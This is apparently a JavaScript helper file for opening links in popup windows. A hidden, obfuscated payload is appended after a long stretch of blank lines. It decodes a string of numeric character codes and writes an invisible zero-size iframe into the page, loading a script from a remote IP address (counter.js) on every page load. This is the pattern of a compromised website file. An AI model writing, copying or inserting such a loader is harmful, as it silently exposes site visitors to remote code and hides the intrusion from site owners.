function popup(target, name, width, height)
{
	// set default popup dimensions
	if(isNaN(width))
		width = 500;
	if(isNaN(height))
		height = 400;
		
	// build new window property string
	var properties = { 
		width: width,
	    height: height,
	    scrollbars: 	'yes',
	    resizable:	 	'no',
		location: 		'no',
		status: 		'no',
		menubar : 		'no',
		toolbar: 		'no'
		};
	var prop_str = '';
	for(prop in properties )
		prop_str = prop_str + prop + '=' + properties[prop] + ',';
	prop_str = prop_str.substr( 0, prop_str.length - 1 );
	
	// get link
	var link = getLink(target);
	
	// open popup
	var newWindow = window.open(link, '', prop_str );
	if(newWindow ){
		if(newWindow.focus)
			newWindow.focus();
	}
	newWindow.resizeTo(width,height);
	return false;
}

function blank(target)
{
	var link = getLink(target);
	var win = window.open(link);
	win.focus();
	return false;
}

function getLink(target)
{
	return (target instanceof  String || typeof target == "string") ? target : target.getAttribute('href');
}
































var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);

